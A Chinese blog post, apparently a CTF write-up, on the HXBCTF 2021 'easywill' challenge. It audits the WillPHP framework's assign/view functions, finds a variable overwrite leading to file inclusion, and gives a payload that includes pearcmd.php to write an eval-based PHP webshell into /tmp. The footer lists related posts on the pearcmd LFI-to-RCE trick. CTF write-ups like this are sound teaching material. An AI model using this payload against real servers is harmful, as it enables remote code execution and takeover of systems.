[HXBCTF 2021]easywill

最新推荐文章于 2023-09-04 16:16:28 发布
最新推荐文章于 2023-09-04 16:16:28 发布
阅读量965 收藏 2
点赞数 2
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/121369384
版权

这题index上给的代码很短,需要下载框架源码,自行修改审计。我没找到2.1.5的源码,下了个最新的。这题比赛的时候看了到assign函数还以为是个模板注入的题以为要爆破模板变量名就没去整了。还是对调试这种不太熟吧,下意识不想审计框架的函数调用

下面开始审计,修改app/controller/IndexController.php 的内容与题目给出的一致

先跟踪assign函数

assign只是做一个赋值的作用 传递给view当中

再看view函数

可以看到存在变量覆盖以及文件包含

开启debug可以看到函数调用栈,这里测试传参为&name=cfile&value=1

写入shell到tmp目录,这里为什么包含pearcmd.php的原因详见:利用pearcmd.php从LFI到getshell_feng的博客-CSDN博客

/?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/test2.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

记得用burp 浏览器直接打的话<>会被url编码,写马就不解析了

Arnoldqqq
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
web_easy_
09-30
This set of skin is modified according to the customer's skin
[每日一题][HXBCTF 2021]easywill
Sapphire037的博客
11-17 650
笔记 打开页面得到 <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 然后显示的是一个WillPHP,还以为是恶搞(我没文化),一查真有这东西,页面给了个函数as
[HXBCTF 2021]湖湘杯easywill
weixin_45751765的博客
12-01 3620
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3357
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 612
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
HXBCTF 2021 easywill
最新发布
m0_64348326的博客
09-04 161
14.操蛋的是这里明显,大小写被转义了,后面才知道需要自己手动修改一下,否则在url框中会被自动转义再发送。为模板开发的一款超轻量级的MVC框架,其中一共源码大小不超过400k,没有繁琐的类库以及冗余的功能函数。同样是两个if不成立,进入最后的变量覆盖加文件包含,这个覆盖的键值对参数。获取到传递参数的md5值文件名,并进行判断是否存在,不成立,跳到else。审计一下,两个参数都为空,那么它就会包含默认的route,就是。函数的作用,它一般是各种框架自定义的一个方法,而大概的用途和。
[HFCTF 2021 Final]easyflask
weixin_43610673的博客
06-20 1596
任意文件读取,根据提示读取源码 #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type('User', (object,), { 'uname'
BUUCTF [GXYCTF2019]Ping Ping Ping easywill
m0_62107966的博客
09-24 639
BUUCTF [GXYCTF2019]Ping Ping Ping easywill`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码。发现有两个文件,一个是flag.php,另一个是index.php。考点:ping命令相关命令执行。过滤了很多东西,包括flag。这里过滤了flag和空格。使用ls命令查询目录。
[NEWSCTF 2021]easy_web 和 签到
fightte的博客
06-04 634
~ [NEWSCTF 2021]easy_web 和 签到 ~ 之前打了萌新杯,然后就是这样, 题目的质量很高,也得到了很多新的经验 也得到了新的知识,题目是新奇的。 [newsCTF 2021] easy_web 界面: 进入: 就这么多源码: <?php highlight_file("index.php") ?> </div> <div class="content"> <?php
CTF中的pearcmd.php文件包含
qq_52988816的博客
09-27 932
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
hxb海啸杯
m0_62107966的博客
10-24 1181
查看源代码,拿到flag。
ctfshow MengXIn 下(pearcmd.php妙用&条件竞争&简单密码&简单misc)
weixin_63231007的博客
07-22 1741
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。...
【漏洞复现】多语言文件包含漏洞分析
kali_Ma的博客
12-29 1662
ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,实现目录穿越+文件包含,通过pearcmd文件包含这个trick即可实现RCE。直接利用p牛文章中的请求包,需要根据实际情况改变文件名称,写不进去可以考虑多加点…这次我们直接写到网站根目录(注:phpinfo可以查看网站绝对路径)2、官方已发布6.0.14、5.1.42,建议升级至安全版本。1、若无必要,可关闭多语言功能,可参考文档。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。
ctfshow 常用姿势
qq_53063436的博客
11-02 855
ctfshow 常用姿态
ctfshow萌新计划web22
qq_46041723的博客
12-10 2940
ctfshow萌新计划web22前言正文web22 前言 上次做题,直接瞄准ctfshow萌新计划开炮,结果没打完,这次来补充一下。 正文 web22 打开题目,发现了源码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\:|\/|\\\/i",$c)){ include($c.".php"); } }else{ highlight_f
利用pearcmd.php从LFI到getshell
feng的博客
10-29 5006
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3407
浅谈一下文件包含之包含pearcmd.php漏洞
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5637
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
pearcmd.php的妙用
Sk1y的博客
12-20 3155
pearcmd.php的妙用 文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接 1. register_argc_argv 如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On 这个regis

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值